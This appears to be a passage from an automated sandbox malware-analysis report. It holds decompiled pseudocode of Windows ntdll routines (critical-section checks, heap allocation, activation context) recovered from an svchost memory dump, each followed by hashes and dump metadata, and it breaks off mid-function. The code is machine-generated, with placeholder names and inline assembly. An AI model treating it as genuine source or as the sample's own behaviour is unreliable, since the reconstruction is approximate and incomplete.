                        				_t44 = E030698D0();
                        				_t62 = _v88;
                        				_t65 = _t44;
                        				if(_t62 != 0) {
                        					asm("lock xadd [edi], eax");
                        					if((_t44 | 0xffffffff) != 0) {
                        						goto L4;
                        					}
                        					_push( *((intOrPtr*)(_t62 + 4)));
                        					E030695D0();
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                        					goto L4;
                        				} else {
                        					L4:
                        					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                        					if(_t65 >= 0) {
                        						_t52 = 1;
                        					} else {
                        						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                        							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                        						}
                        					}
                        					_t35 = _t52;
                        					goto L8;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: cd811d8483fad9e787b1424310f19c193c29d6d7ca6516a7feec10cbb2b9791c
                        • Instruction ID: 50b14bc31842ef44a8472a55dd7d9975ecfc79dee7b79b58dfee92833e2cb649
                        • Opcode Fuzzy Hash: cd811d8483fad9e787b1424310f19c193c29d6d7ca6516a7feec10cbb2b9791c
                        • Instruction Fuzzy Hash: 0931AFB550A3059FC750DF28C9809AFBBE8EBD9654F04092FF99487210D635DE04CB96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E03031B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                        				intOrPtr _v8;
                        				char _v16;
                        				intOrPtr* _t26;
                        				intOrPtr _t29;
                        				void* _t30;
                        				signed int _t31;
                        
                        				_t27 = __ecx;
                        				_t29 = __edx;
                        				_t31 = 0;
                        				_v8 = __edx;
                        				if(__edx == 0) {
                        					L18:
                        					_t30 = 0xc000000d;
                        					goto L12;
                        				} else {
                        					_t26 = _a4;
                        					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                        						goto L18;
                        					} else {
                        						E0306BB40(__ecx,  &_v16, __ecx);
                        						_push(_t26);
                        						_push(0);
                        						_push(0);
                        						_push(_t29);
                        						_push( &_v16);
                        						_t30 = E0306A9B0();
                        						if(_t30 >= 0) {
                        							_t19 =  *_t26;
                        							if( *_t26 != 0) {
                        								goto L7;
                        							} else {
                        								 *_a8 =  *_a8 & 0;
                        							}
                        						} else {
                        							if(_t30 != 0xc0000023) {
                        								L9:
                        								_push(_t26);
                        								_push( *_t26);
                        								_push(_t31);
                        								_push(_v8);
                        								_push( &_v16);
                        								_t30 = E0306A9B0();
                        								if(_t30 < 0) {
                        									L12:
                        									if(_t31 != 0) {
                        										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                        									}
                        								} else {
                        									 *_a8 = _t31;
                        								}
                        							} else {
                        								_t19 =  *_t26;
                        								if( *_t26 == 0) {
                        									_t31 = 0;
                        								} else {
                        									L7:
                        									_t31 = L03044620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                        								}
                        								if(_t31 == 0) {
                        									_t30 = 0xc0000017;
                        								} else {
                        									goto L9;
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t30;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: WindowsExcludedProcs
                        • API String ID: 0-3583428290
                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction ID: 401ee6decbd3a9ec4af95fd6c894f3b9a203b77404e3a9fa44b2f12b05a0970b
                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction Fuzzy Hash: 6221287A503218EBCB25FA55C840F9FB7ACAF8AA10F194865F9149B204D634DD018BB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0304F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                        				intOrPtr _t13;
                        				intOrPtr _t14;
                        				signed int _t16;
                        				signed char _t17;
                        				intOrPtr _t19;
                        				intOrPtr _t21;
                        				intOrPtr _t23;
                        				intOrPtr* _t25;
                        
                        				_t25 = _a8;
                        				_t17 = __ecx;
                        				if(_t25 == 0) {
                        					_t19 = 0xc00000f2;
                        					L8:
                        					return _t19;
                        				}
                        				if((__ecx & 0xfffffffe) != 0) {
                        					_t19 = 0xc00000ef;
                        					goto L8;
                        				}
                        				_t19 = 0;
                        				 *_t25 = 0;
                        				_t21 = 0;
                        				_t23 = "Actx ";
                        				if(__edx != 0) {
                        					if(__edx == 0xfffffffc) {
                        						L21:
                        						_t21 = 0x200;
                        						L5:
                        						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                        						 *_t25 = _t13;
                        						L6:
                        						if(_t13 == 0) {
                        							if((_t17 & 0x00000001) != 0) {
                        								 *_t25 = _t23;
                        							}
                        						}
                        						L7:
                        						goto L8;
                        					}
                        					if(__edx == 0xfffffffd) {
                        						 *_t25 = _t23;
                        						_t13 = _t23;
                        						goto L6;
                        					}
                        					_t13 =  *((intOrPtr*)(__edx + 0x10));
                        					 *_t25 = _t13;
                        					L14:
                        					if(_t21 == 0) {
                        						goto L6;
                        					}
                        					goto L5;
                        				}
                        				_t14 = _a4;
                        				if(_t14 != 0) {
                        					_t16 =  *(_t14 + 0x14) & 0x00000007;
                        					if(_t16 <= 1) {
                        						_t21 = 0x1f8;
                        						_t13 = 0;
                        						goto L14;
                        					}
                        					if(_t16 == 2) {
                        						goto L21;
                        					}
                        					if(_t16 != 4) {
                        						_t19 = 0xc00000f0;
                        						goto L7;
                        					}
                        					_t13 = 0;
                        					goto L6;
                        				} else {
                        					_t21 = 0x1f8;
                        					goto L5;
                        				}
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Actx
                        • API String ID: 0-89312691
                        • Opcode ID: 4e68067083636b66a764f7be1cbc5de9dee32dfb2adfc53eb2083f9175d61553
                        • Instruction ID: 80c6a8ce635b40cc9e286aaf21a872adf56384c362e4b53ac831330061bec32e
                        • Opcode Fuzzy Hash: 4e68067083636b66a764f7be1cbc5de9dee32dfb2adfc53eb2083f9175d61553
                        • Instruction Fuzzy Hash: E611E6F47476039BFB64CE1D8B9073BB2D9AB85264F28493AE461CB791D77CDA018740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 71%
                        			E030D8DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				void* _t41;
                        
                        				_t40 = __esi;
                        				_t39 = __edi;
                        				_t38 = __edx;
                        				_t35 = __ecx;
                        				_t34 = __ebx;
                        				_push(0x74);
                        				_push(0x3100d50);
                        				E0307D0E8(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                        				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                        					E030B5720(0x65, 0, "Critical error detected %lx\n", _t35);
                        					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                        						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                        						asm("int3");
                        						 *(_t41 - 4) = 0xfffffffe;
                        					}
                        				}
                        				 *(_t41 - 4) = 1;
                        				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                        				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                        				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                        				 *((intOrPtr*)(_t41 - 0x64)) = L0307DEF0;
                        				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                        				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                        				_push(_t41 - 0x70);
                        				L0307DEF0(1, _t38);
                        				 *(_t41 - 4) = 0xfffffffe;
                        				return E0307D130(_t34, _t39, _t40);
                        			}

                        Strings
                        • Critical error detected %lx, xrefs: 030D8E21
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Critical error detected %lx
                        • API String ID: 0-802127002
                        • Opcode ID: 7c7b01db318d75df2b8931961474f5d6a8e2bff3054b401e330747eef367486e
                        • Instruction ID: 8cfd9dc3ec84af4a17b61853a876ab2d1acd62cf61addf538963ff24d960241b
                        • Opcode Fuzzy Hash: 7c7b01db318d75df2b8931961474f5d6a8e2bff3054b401e330747eef367486e
                        • Instruction Fuzzy Hash: A9113575D56348EBDB25DFA889057DDBBF0AB04315F24825ED429AB282C3744602CF19
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Strings
                        • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 030BFF60
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmp
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                        • API String ID: 0-1911121157
                        • Opcode ID: 6a575698182a759ac554ea9de252923325c903417a9ee52cb8e9eef4d995fbfa
                        • Instruction ID: 04c68635a45f2d0ac4bba42656fe5aff70d155b9d9ce0a8f89bb3e678a13a433
                        • Opcode Fuzzy Hash: 6a575698182a759ac554ea9de252923325c903417a9ee52cb8e9eef4d995fbfa
                        • Instruction Fuzzy Hash: 06110075912245EFCB12EF50CD48FD9BBF1FF49704F188454E0086B2A1C7399990CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E030F5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t296;
                        				signed char _t298;
                        				signed int _t301;
                        				signed int _t306;
                        				signed int _t310;
                        				signed char _t311;
                        				intOrPtr _t312;
                        				signed int _t313;
                        				void* _t327;
                        				signed int _t328;
                        				intOrPtr _t329;
                        				intOrPtr _t333;
                        				signed char _t334;
                        				signed int _t336;
                        				void* _t339;
                        				signed int _t340;
                        				signed int _t356;
                        				signed int _t362;
                        				short _t367;
                        				short _t368;
                        				short _t373;
                        				signed int _t380;
                        				void* _t382;
                        				short _t385;
                        				signed short _t392;
                        				signed char _t393;
                        				signed int _t395;
                        				signed char _t397;
                        				signed int _t398;
                        				signed short _t402;
                        				void* _t406;
                        				signed int _t412;
                        				signed char _t414;
                        				signed short _t416;
                        				signed int _t421;
                        				signed char _t427;
                        				intOrPtr _t434;
                        				signed char _t435;
                        				signed int _t436;
                        				signed int _t442;
                        				signed int _t446;
                        				signed int _t447;
                        				signed int _t451;
                        				signed int _t453;
                        				signed int _t454;
                        				signed int _t455;
                        				intOrPtr _t456;
                        				intOrPtr* _t457;
                        				short _t458;
                        				signed short _t462;
                        				signed int _t469;
                        				intOrPtr* _t474;
                        				signed int _t475;
                        				signed int _t479;
                        				signed int _t480;
                        				signed int _t481;
                        				short _t485;
                        				signed int _t491;
                        				signed int* _t494;
                        				signed int _t498;
                        				signed int _t505;
                        				intOrPtr _t506;
                        				signed short _t508;
                        				signed int _t511;
                        				void* _t517;
                        				signed int _t519;
                        				signed int _t522;
                        				void* _t523;
                        				signed int _t524;
                        				void* _t528;
                        				signed int _t529;
                        
                        				_push(0xd4);
                        				_push(0x3101178);
                        				E0307D0E8(__ebx, __edi, __esi);
                        				_t494 = __edx;
                        				 *(_t528 - 0xcc) = __edx;
                        				_t511 = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                        				 *(_t528 - 0xbc) = __ecx;
                        				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                        				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                        				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                        				_t427 = 0;
                        				 *(_t528 - 0x74) = 0;
                        				 *(_t528 - 0x9c) = 0;
                        				 *(_t528 - 0x84) = 0;
                        				 *(_t528 - 0xac) = 0;
                        				 *(_t528 - 0x88) = 0;
                        				 *(_t528 - 0xa8) = 0;
                        				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                        				if( *(_t528 + 0x1c) <= 0x80) {
                        					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                        					if(__eflags != 0) {
                        						_t421 = E030F4C56(0, __edx, __ecx, __eflags);
                        						__eflags = _t421;
                        						if(_t421 != 0) {
                        							 *((intOrPtr*)(_t528 - 4)) = 0;
                        							E0306D000(0x410);
                        							 *(_t528 - 0x18) = _t529;
                        							 *(_t528 - 0x9c) = _t529;
                        							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                        							E030F5542(_t528 - 0x9c, _t528 - 0x84);
                        						}
                        					}
                        					_t435 = _t427;
                        					 *(_t528 - 0xd0) = _t435;
                        					_t474 = _t511 + 0x65;
                        					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                        					_t511 = 0x18;
                        					while(1) {
                        						 *(_t528 - 0xa0) = _t427;
                        						 *(_t528 - 0xbc) = _t427;
                        						 *(_t528 - 0x80) = _t427;
                        						 *(_t528 - 0x78) = 0x50;
                        						 *(_t528 - 0x79) = _t427;
                        						 *(_t528 - 0x7a) = _t427;
                        						 *(_t528 - 0x8c) = _t427;
                        						 *(_t528 - 0x98) = _t427;
                        						 *(_t528 - 0x90) = _t427;
                        						 *(_t528 - 0xb0) = _t427;
                        						 *(_t528 - 0xb8) = _t427;
                        						_t296 = 1 << _t435;
                        						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                        						__eflags = _t436 & _t296;
                        						if((_t436 & _t296) != 0) {
                        							goto L92;
                        						}
                        						__eflags =  *((char*)(_t474 - 1));
                        						if( *((char*)(_t474 - 1)) == 0) {
                        							goto L92;
                        						}
                        						_t301 =  *_t474;
                        						__eflags = _t494[1] - _t301;
                        						if(_t494[1] <= _t301) {
                        							L10:
                        							__eflags =  *(_t474 - 5) & 0x00000040;
                        							if(( *(_t474 - 5) & 0x00000040) == 0) {
                        								L12:
                        								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                        								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                        									goto L92;
                        								}
                        								_t442 =  *(_t474 - 0x11) & _t494[3];
                        								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                        								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                        									goto L92;
                        								}
                        								__eflags = _t442 -  *(_t474 - 0x11);
                        								if(_t442 !=  *(_t474 - 0x11)) {
                        									goto L92;
                        								}
                        								L15:
                        								_t306 =  *(_t474 + 1) & 0x000000ff;
                        								 *(_t528 - 0xc0) = _t306;
                        								 *(_t528 - 0xa4) = _t306;
                        								__eflags =  *0x31160e8;
                        								if( *0x31160e8 != 0) {
                        									__eflags = _t306 - 0x40;
                        									if(_t306 < 0x40) {
                        										L20:
                        										asm("lock inc dword [eax]");
                        										_t310 =  *0x31160e8; // 0x0
                        										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                        										__eflags = _t311 & 0x00000001;
                        										if((_t311 & 0x00000001) == 0) {
                        											 *(_t528 - 0xa0) = _t311;
                        											_t475 = _t427;
                        											 *(_t528 - 0x74) = _t427;
                        											__eflags = _t475;
                        											if(_t475 != 0) {
                        												L91:
                        												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                        												goto L92;
                        											}
                        											asm("sbb edi, edi");
                        											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                        											_t511 = _t498;
                        											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                        											__eflags =  *(_t312 - 5) & 1;
                        											if(( *(_t312 - 5) & 1) != 0) {
                        												_push(_t528 - 0x98);
                        												_push(0x4c);
                        												_push(_t528 - 0x70);
                        												_push(1);
                        												_push(0xfffffffa);
                        												_t412 = E03069710();
                        												_t475 = _t427;
                        												__eflags = _t412;
                        												if(_t412 >= 0) {
                        													_t414 =  *(_t528 - 0x98) - 8;
                        													 *(_t528 - 0x98) = _t414;
                        													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                        													 *(_t528 - 0x8c) = _t416;
                        													 *(_t528 - 0x79) = 1;
                        													_t511 = (_t416 & 0x0000ffff) + _t498;
                        													__eflags = _t511;
                        												}
                        											}
                        											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                        											__eflags = _t446 & 0x00000004;
                        											if((_t446 & 0x00000004) != 0) {
                        												__eflags =  *(_t528 - 0x9c);
                        												if( *(_t528 - 0x9c) != 0) {
                        													 *(_t528 - 0x7a) = 1;
                        													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                        													__eflags = _t511;
                        												}
                        											}
                        											_t313 = 2;
                        											_t447 = _t446 & _t313;
                        											__eflags = _t447;
                        											 *(_t528 - 0xd4) = _t447;
                        											if(_t447 != 0) {
                        												_t406 = 0x10;
                        												_t511 = _t511 + _t406;
                        												__eflags = _t511;
                        											}
                        											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                        											 *(_t528 - 0x88) = _t427;
                        											__eflags =  *(_t528 + 0x1c);
                        											if( *(_t528 + 0x1c) <= 0) {
                        												L45:
                        												__eflags =  *(_t528 - 0xb0);
                        												if( *(_t528 - 0xb0) != 0) {
                        													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
                        													__eflags = _t511;
                        												}
                        												__eflags = _t475;
                        												if(_t475 != 0) {
                        													asm("lock dec dword [ecx+edx*8+0x4]");
                        													goto L100;
                        												} else {
                        													_t494[3] = _t511;
                        													_t451 =  *(_t528 - 0xa0);
                        													_t427 = E03066DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
                        													 *(_t528 - 0x88) = _t427;
                        													__eflags = _t427;
                        													if(_t427 == 0) {
                        														__eflags = _t511 - 0xfff8;
                        														if(_t511 <= 0xfff8) {
                        															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
                        															asm("sbb ecx, ecx");
                        															__eflags = (_t451 & 0x000000e2) + 8;
                        														}
                        														asm("lock dec dword [eax+edx*8+0x4]");
                        														L100:
                        														goto L101;
                        													}
                        													_t453 =  *(_t528 - 0xa0);
                        													 *_t494 = _t453;
                        													_t494[1] = _t427;
                        													_t494[2] =  *(_t528 - 0xbc);
                        													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
                        													 *_t427 =  *(_t453 + 0x24) | _t511;
                        													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
                        													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x14);
                        													if( *(_t528 + 0x14) == 0) {
                        														__eflags =  *[fs:0x18] + 0xf50;
                        													}
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													asm("movsd");
                        													__eflags =  *(_t528 + 0x18);
                        													if( *(_t528 + 0x18) == 0) {
                        														_t454 =  *(_t528 - 0x80);
                        														_t479 =  *(_t528 - 0x78);
                        														_t327 = 1;
                        														__eflags = 1;
                        													} else {
                        														_t146 = _t427 + 0x50; // 0x50
                        														_t454 = _t146;
                        														 *(_t528 - 0x80) = _t454;
                        														_t382 = 0x18;
                        														 *_t454 = _t382;
                        														 *((short*)(_t454 + 2)) = 1;
                        														_t385 = 0x10;
                        														 *((short*)(_t454 + 6)) = _t385;
                        														 *(_t454 + 4) = 0;
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														asm("movsd");
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = 0x68;
                        														 *(_t528 - 0x78) = _t479;
                        													}
                        													__eflags =  *(_t528 - 0x79) - _t327;
                        													if( *(_t528 - 0x79) == _t327) {
                        														_t524 = _t479 + _t427;
                        														_t508 =  *(_t528 - 0x8c);
                        														 *_t524 = _t508;
                        														_t373 = 2;
                        														 *((short*)(_t524 + 2)) = _t373;
                        														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
                        														 *((short*)(_t524 + 4)) = 0;
                        														_t167 = _t524 + 8; // 0x8
                        														E0306F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t380 =  *(_t528 - 0x80);
                        														__eflags = _t380;
                        														if(_t380 != 0) {
                        															_t173 = _t380 + 4;
                        															 *_t173 =  *(_t380 + 4) | 1;
                        															__eflags =  *_t173;
                        														}
                        														_t454 = _t524;
                        														 *(_t528 - 0x80) = _t454;
                        														_t327 = 1;
                        														__eflags = 1;
                        													}
                        													__eflags =  *(_t528 - 0xd4);
                        													if( *(_t528 - 0xd4) == 0) {
                        														_t505 =  *(_t528 - 0x80);
                        													} else {
                        														_t505 = _t479 + _t427;
                        														_t523 = 0x10;
                        														 *_t505 = _t523;
                        														_t367 = 3;
                        														 *((short*)(_t505 + 2)) = _t367;
                        														_t368 = 4;
                        														 *((short*)(_t505 + 6)) = _t368;
                        														 *(_t505 + 4) = 0;
                        														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
                        														_t327 = 1;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 = _t479 + _t523;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t454;
                        														if(_t454 != 0) {
                        															_t186 = _t454 + 4;
                        															 *_t186 =  *(_t454 + 4) | 1;
                        															__eflags =  *_t186;
                        														}
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0x7a) - _t327;
                        													if( *(_t528 - 0x7a) == _t327) {
                        														 *(_t528 - 0xd4) = _t479 + _t427;
                        														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
                        														E0306F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + _t522;
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t199 = _t505 + 4;
                        															 *_t199 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t199;
                        														}
                        														_t505 =  *(_t528 - 0xd4);
                        														 *(_t528 - 0x80) = _t505;
                        													}
                        													__eflags =  *(_t528 - 0xa8);
                        													if( *(_t528 - 0xa8) != 0) {
                        														_t356 = _t479 + _t427;
                        														 *(_t528 - 0xd4) = _t356;
                        														_t462 =  *(_t528 - 0xac);
                        														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
                        														_t485 = 0xc;
                        														 *((short*)(_t356 + 2)) = _t485;
                        														 *(_t356 + 6) = _t462;
                        														 *((short*)(_t356 + 4)) = 0;
                        														_t211 = _t356 + 8; // 0x9
                        														E0306F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
                        														E0306FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0x18;
                        														_t427 =  *(_t528 - 0x88);
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t505 =  *(_t528 - 0xd4);
                        														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														_t362 =  *(_t528 - 0x80);
                        														__eflags = _t362;
                        														if(_t362 != 0) {
                        															_t222 = _t362 + 4;
                        															 *_t222 =  *(_t362 + 4) | 1;
                        															__eflags =  *_t222;
                        														}
                        													}
                        													__eflags =  *(_t528 - 0xb0);
                        													if( *(_t528 - 0xb0) != 0) {
                        														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
                        														_t458 = 0xb;
                        														 *((short*)(_t479 + _t427 + 2)) = _t458;
                        														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
                        														 *((short*)(_t427 + 4 + _t479)) = 0;
                        														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
                        														E0306FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
                        														_t529 = _t529 + 0xc;
                        														 *(_t427 + 4) =  *(_t427 + 4) | 1;
                        														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
                        														 *(_t528 - 0x78) = _t479;
                        														__eflags = _t505;
                        														if(_t505 != 0) {
                        															_t241 = _t505 + 4;
                        															 *_t241 =  *(_t505 + 4) | 1;
                        															__eflags =  *_t241;
                        														}
                        													}
                        													_t328 =  *(_t528 + 0x1c);
                        													__eflags = _t328;
                        													if(_t328 == 0) {
                        														L87:
                        														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
                        														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
                        														_t455 =  *(_t528 - 0xdc);
                        														 *(_t427 + 0x14) = _t455;
                        														_t480 =  *(_t528 - 0xa0);
                        														_t517 = 3;
                        														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
                        														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
                        															asm("rdtsc");
                        															 *(_t427 + 0x3c) = _t480;
                        														} else {
                        															 *(_t427 + 0x3c) = _t455;
                        														}
                        														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
                        														_t456 =  *[fs:0x18];
                        														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
                        														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
                        														_t427 = 0;
                        														__eflags = 0;
                        														_t511 = 0x18;
                        														goto L91;
                        													} else {
                        														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
                        														__eflags = _t519;
                        														 *(_t528 - 0x8c) = _t328;
                        														do {
                        															_t506 =  *((intOrPtr*)(_t519 - 4));
                        															_t457 =  *((intOrPtr*)(_t519 - 0xc));
                        															 *(_t528 - 0xd4) =  *(_t519 - 8);
                        															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
                        															__eflags =  *(_t333 + 0x36) & 0x00004000;
                        															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
                        																_t334 =  *_t519;
                        															} else {
                        																_t334 = 0;
                        															}
                        															_t336 = _t334 & 0x000000ff;
                        															__eflags = _t336;
                        															_t427 =  *(_t528 - 0x88);
                        															if(_t336 == 0) {
                        																_t481 = _t479 + _t506;
                        																__eflags = _t481;
                        																 *(_t528 - 0x78) = _t481;
                        																E0306F3E0(_t479 + _t427, _t457, _t506);
                        																_t529 = _t529 + 0xc;
                        															} else {
                        																_t340 = _t336 - 1;
                        																__eflags = _t340;
                        																if(_t340 == 0) {
